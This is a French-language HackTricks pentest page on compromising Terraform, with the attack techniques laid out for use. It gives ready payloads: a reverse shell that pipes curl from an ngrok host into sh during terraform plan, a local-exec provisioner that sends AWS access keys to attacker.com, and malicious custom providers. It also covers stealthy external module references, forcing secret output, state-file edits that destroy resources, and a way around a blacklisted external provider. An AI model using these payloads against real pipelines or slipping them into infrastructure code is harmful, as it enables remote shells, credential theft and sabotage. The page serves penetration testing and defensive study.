Terraform Security

Soutenir HackTricks

Informations de base

Extrait des docs :

HashiCorp Terraform est un outil d'infrastructure en tant que code qui vous permet de définir à la fois des ressources cloud et sur site dans des fichiers de configuration lisibles par l'homme que vous pouvez versionner, réutiliser et partager. Vous pouvez ensuite utiliser un flux de travail cohérent pour provisionner et gérer toute votre infrastructure tout au long de son cycle de vie. Terraform peut gérer des composants de bas niveau comme les ressources de calcul, de stockage et de mise en réseau, ainsi que des composants de haut niveau comme les entrées DNS et les fonctionnalités SaaS.

Comment fonctionne Terraform ?

Terraform crée et gère des ressources sur des plateformes cloud et d'autres services via leurs interfaces de programmation d'applications (API). Les fournisseurs permettent à Terraform de fonctionner avec pratiquement n'importe quelle plateforme ou service disposant d'une API accessible.

HashiCorp et la communauté Terraform ont déjà écrit plus de 1700 fournisseurs pour gérer des milliers de types de ressources et de services différents, et ce nombre continue de croître. Vous pouvez trouver tous les fournisseurs disponibles publiquement sur le Terraform Registry, y compris Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, et bien d'autres.

Le flux de travail principal de Terraform se compose de trois étapes :

  • Écrire : Vous définissez des ressources, qui peuvent être réparties sur plusieurs fournisseurs et services cloud. Par exemple, vous pourriez créer une configuration pour déployer une application sur des machines virtuelles dans un réseau de Cloud Privé Virtuel (VPC) avec des groupes de sécurité et un équilibreur de charge.

  • Planifier : Terraform crée un plan d'exécution décrivant l'infrastructure qu'il va créer, mettre à jour ou détruire en fonction de l'infrastructure existante et de votre configuration.

  • Appliquer : Sur approbation, Terraform effectue les opérations proposées dans le bon ordre, en respectant les dépendances des ressources. Par exemple, si vous mettez à jour les propriétés d'un VPC et changez le nombre de machines virtuelles dans ce VPC, Terraform recréera le VPC avant de mettre à l'échelle les machines virtuelles.

Laboratoire Terraform

Il vous suffit d'installer terraform sur votre ordinateur.

Voici un guide et voici la meilleure façon de télécharger terraform.

RCE dans Terraform

Terraform n'a pas de plateforme exposant une page web ou un service réseau que nous pouvons énumérer, donc, la seule façon de compromettre terraform est de pouvoir ajouter/modifier des fichiers de configuration terraform.

Cependant, terraform est un composant très sensible à compromettre car il aura un accès privilégié à différents emplacements afin de fonctionner correctement.

Le principal moyen pour un attaquant de pouvoir compromettre le système où terraform fonctionne est de compromettre le dépôt qui stocke les configurations terraform, car à un moment donné, elles vont être interprétées.

En fait, il existe des solutions qui exécutent automatiquement terraform plan/apply après qu'une PR soit créée, comme Atlantis :

Atlantis Security

Si vous parvenez à compromettre un fichier terraform, il existe différentes façons de réaliser un RCE lorsque quelqu'un exécute terraform plan ou terraform apply.

Terraform plan

Terraform plan est la commande la plus utilisée dans terraform et les développeurs/solutions utilisant terraform l'appellent tout le temps, donc la façon la plus simple d'obtenir un RCE est de s'assurer que vous empoisonnez un fichier de configuration terraform qui exécutera des commandes arbitraires dans un terraform plan.

Utilisation d'un fournisseur externe

Terraform propose le external provider qui fournit un moyen d'interfacer entre Terraform et des programmes externes. Vous pouvez utiliser la source de données external pour exécuter du code arbitraire pendant un plan.

Injecter dans un fichier de configuration terraform quelque chose comme ce qui suit exécutera un shell inversé lors de l'exécution de terraform plan :

data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}

Utilisation d'un fournisseur personnalisé

Un attaquant pourrait envoyer un fournisseur personnalisé au Terraform Registry et ensuite l'ajouter au code Terraform dans une branche de fonctionnalité (exemple ici):

terraform {
required_providers {
evil = {
source  = "evil/evil"
version = "1.0"
}
}
}

provider "evil" {}

Le fournisseur est téléchargé dans l'init et exécutera le code malveillant lorsque plan est exécuté.

Vous pouvez trouver un exemple dans https://github.com/rung/terraform-provider-cmdexec

Utilisation d'une référence externe

Les deux options mentionnées sont utiles mais pas très discrètes (la seconde est plus discrète mais plus complexe que la première). Vous pouvez effectuer cette attaque même de manière plus discrète, en suivant ces suggestions :

  • Au lieu d'ajouter le rev shell directement dans le fichier terraform, vous pouvez charger une ressource externe qui contient le rev shell :

module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}

Vous pouvez trouver le code rev shell dans https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules

  • Dans la ressource externe, utilisez la fonctionnalité ref pour cacher le code rev shell terraform dans une branche à l'intérieur du dépôt, quelque chose comme : git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b

Terraform Apply

Terraform apply sera exécuté pour appliquer tous les changements, vous pouvez également en abuser pour obtenir RCE en injectant un fichier Terraform malveillant avec local-exec. Vous devez juste vous assurer qu'une charge utile comme les suivantes se termine dans le fichier main.tf :

// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}

// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}

Suivez les suggestions de la technique précédente pour effectuer cette attaque de manière plus discrète en utilisant des références externes.

Secrets Dumps

Vous pouvez avoir des valeurs secrètes utilisées par terraform extraites en exécutant terraform apply en ajoutant au fichier terraform quelque chose comme :

output "dotoken" {
value = nonsensitive(var.do_token)
}

Abuser des fichiers d'état Terraform

Dans le cas où vous avez un accès en écriture sur les fichiers d'état terraform mais ne pouvez pas modifier le code terraform, cette recherche propose des options intéressantes pour tirer parti du fichier :

Supprimer des ressources

Il existe 2 façons de détruire des ressources :

  1. Insérer une ressource avec un nom aléatoire dans le fichier d'état pointant vers la vraie ressource à détruire

Parce que terraform verra que la ressource ne devrait pas exister, il la détruira (suivant l'ID de la vraie ressource indiqué). Exemple de la page précédente :

{
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
},
  1. Modifier la ressource à supprimer de manière à ce qu'il ne soit pas possible de mettre à jour (afin qu'elle soit supprimée et recréée)

Pour une instance EC2, modifier le type de l'instance suffit à faire en sorte que terraform la supprime et la recrée.

RCE

Il est également possible de créer un fournisseur personnalisé et de remplacer simplement l'un des fournisseurs dans le fichier d'état terraform par le malveillant ou d'ajouter une ressource vide avec le fournisseur malveillant. Exemple de la recherche originale :

"resources": [
{
"mode": "managed",
"type": "scaffolding_example",
"name": "example",
"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
"instances": [

]
},

Remplacer le fournisseur sur liste noire

Dans le cas où vous rencontrez une situation où hashicorp/external a été mis sur liste noire, vous pouvez réimplémenter le fournisseur external en procédant comme suit. Remarque : Nous utilisons un fork du fournisseur externe publié par https://registry.terraform.io/providers/nazarewk/external/latest. Vous pouvez également publier votre propre fork ou réimplémentation.

terraform {
required_providers {
external = {
source  = "nazarewk/external"
version = "3.0.0"
}
}
}

Ensuite, vous pouvez utiliser external comme d'habitude.

data "external" "example" {
program = ["sh", "-c", "whoami"]
}

Outils d'Audit

  • tfsec : tfsec utilise l'analyse statique de votre code terraform pour repérer les configurations incorrectes potentielles.

  • terascan : Terrascan est un analyseur de code statique pour l'Infrastructure as Code.

Références

Soutenir HackTricks

Last updated